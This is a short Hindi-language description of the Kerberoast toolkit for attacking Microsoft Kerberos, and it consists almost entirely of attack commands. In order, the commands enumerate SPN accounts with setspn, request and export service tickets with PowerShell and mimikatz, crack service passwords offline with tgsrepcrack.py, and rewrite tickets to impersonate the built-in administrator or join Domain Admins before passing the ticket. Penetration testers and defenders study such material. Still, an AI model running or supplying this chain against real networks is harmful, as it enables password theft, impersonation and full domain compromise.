
MS Kerberos कार्यान्वयनों पर हमला करने के लिए टूलकिट: SPN खाते निकालें, टिकटों का अनुरोध और निर्यात करें, सेवा पासवर्ड क्रैक करें, प्रतिरूपण और विशेषाधिकार वृद्धि के लिए टिकटों को पुनः लिखें।
Kerberoast, MS Kerberos कार्यान्वयनों पर हमला करने के लिए उपकरणों की एक श्रृंखला है। नीचे प्रत्येक उपकरण की संक्षिप्त जानकारी दी गई है।
PS C:\> setspn -T medin -Q */*
एक टिकट:
PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"
सभी टिकट
PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\> setspn.exe -T medin.local -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
mimikatz # kerberos::list /export
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
उपयोगकर्ता को भिन्न उपयोगकर्ता के रूप में दिखाएँ
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500
उपयोगकर्ता को किसी अन्य समूह (इस मामले में डोमेन एडमिन) में जोड़ें
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512
kerberos::ptt sql.kirbi